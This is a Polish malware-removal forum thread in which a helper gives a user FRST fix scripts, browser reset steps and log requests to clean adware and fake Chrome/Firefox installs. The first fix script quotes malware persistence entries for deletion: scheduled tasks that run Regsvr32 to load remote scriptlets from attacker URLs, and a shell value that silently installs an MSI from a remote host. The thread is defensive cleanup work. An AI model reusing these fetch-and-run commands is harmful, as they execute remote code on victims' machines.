Skocz do zawartości

Podmienione przeglądarki, pliki Big_farm itp.


Rekomendowane odpowiedzi

Dzień dobry,

 

znalazłem forum w internecie, podczas szukania rozwiązania usunięcia trojanów z komputera. Przez ostatni miesiąc mam problem z przeglądarką chrome i firefoxem - zamiast przeglądarki chrome ustawiają mi się dziwne strony, a dodatkowo co jakiś czas instalują się skróty na pulpicie Big_Farm itp.

 

Przeglądają forum wykonałem czynności, które pojawiają się przy każdym wątku. Poniżej załączam raporty z AdwCleaner, FRST i Gmer. Proszę o pomoc w oczyszczeniu dysku z wirusów. 

 

Z góry dziękuję za zainteresowanie i wszelką pomoc :) 

 

Addition.txt

AdwCleanerC0.txt

FRST.txt

gmer.txt

Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

Przeglądają forum wykonałem czynności, które pojawiają się przy każdym wątku. Poniżej załączam raporty z AdwCleaner, FRST i Gmer. Proszę o pomoc w oczyszczeniu dysku z wirusów. 

 

Nie zapożyczaj działań z innych tematów, bo to może się źle skończyć. 

P.S: Pomijam brak raportu Shortcut, choć nie wolno mi tego robić. W następnym poście obowiązkowo go oczekuję. 

 


 

Widać infekcje adware oraz fałszywe przeglądarki.

 

Szybko się z tym uporamy. 

 

Portale z oprogramowaniem / Instalatory - na co uważać

 

1. Otwórz Notatnik w nim wklej:

 

CloseProcesses:
CreateRestorePoint:
Task: {AA2F5AA1-E61F-42A6-B2D2-82908FC1C595} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8xMWlYOWIdN8FcFTFyOThQNWzSNjF8MkQWNdY4FTzWNq== scrobj.dll
Task: {CAAE5885-CF5C-4396-B2CB-351343F4F421} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8xMWlYOWIdN8FcFTFyOThQNWzSNjF8MkQWNdY4FTzWNq== scrobj.dll
FirewallRules: [{CD91FEC5-B909-455D-BFA6-F2D988878524}] => (Allow) C:\Program Files (x86)\Everness\Application\chrome.exe
FirewallRules: [{2184EBA4-E346-4471-B4F3-A76A961E90B9}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{F884D972-202D-4742-9811-8E5A129B9050}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
RemoveDirectory: C:\Program Files (x86)\Everness
RemoveDirectory: C:\Users\Michał\AppData\Local\Everness
RemoveDirectory: C:\Users\Michal\AppData\Roaming\Everness
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\Michał\AppData\Local\Firefox
RemoveDirectory: C:\Users\Michal\AppData\Roaming\Firefox
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-2511481870-1426507333-4213709584-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8xMWlYOWIdN8FcFTFyOThQNWzSNjF8MkQWNdY4FTzWNq== /q
IFEO\DisplaySwitch.exe: [Debugger]
IFEO\taskmgr.exe: [Debugger]
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
S3 dbx; system32\DRIVERS\dbx.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
RemoveDirectory: C:\Program Files (x86)\Elex-tech
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

2. Wyczyść i zabezpiecz przeglądarki. 

 

Google Chrome

  • Zresetuj synchronizację (o ile włączona): KLIK.
  • Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia.
  • Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
  • Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google.
  • Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin
  • Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Google Chrome. To wymagany krok to kasacji modyfikacji infekcji.
Mozilla FireFox
  • Odłącz synchronizację (o ile włączona): KLIK.
  • Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone.
  • Menu Historia > Wyczyść historię przeglądania.
  • Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin.
3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry).

 

everness;firefox

 

Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum.

 

4. Upewnij się, że AdwCleaner już niczego nie wykrywa. Ewentualne detekcję daj do kasacji. 

 

5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Odnośnik do komentarza

Wygląda to już w porządku.

 

Poprawki: 

 

1. Otwórz Notatnik w nim wklej:

 

CloseProcesses:
CreateRestorePoint:
DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Everness
DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Everness]
"path"="C:\Program Files (x86)\Everness\
DeleteKey: HKEY_USERS\S-1-5-21-2511481870-1426507333-4213709584-1000\Software\Everness
DeleteKey: HKEY_USERS\S-1-5-21-2511481870-1426507333-4213709584-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\39973f75_0
""="{0.0.0.00000000}.{ad291970-153d-483e-873e-ccbe8bb3130f}
\Device\HarddiskVolume2\Program Files (x86)\Everness\Application\chrome.exe%b{00000000-0000-0000-0000-000000000000}
DeleteKey: HKEY_USERS\S-1-5-21-2511481870-1426507333-4213709584-1000\Software\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe
""="C:\Program Files (x86)\Everness\Application\chrome.exe
DeleteKey: HKEY_USERS\S-1-5-21-2511481870-1426507333-4213709584-1000\Software\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe
"Path"="C:\Program Files (x86)\Everness\Application
HKEY_USERS\S-1-5-21-2511481870-1426507333-4213709584-1000\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
"C:\Program Files (x86)\Everness\Application\chrome.exe"="Google Chrome
Reboot:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

2. Dostarcz plik Fixlog i podsumuj obecny stan systemu.

Odnośnik do komentarza

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...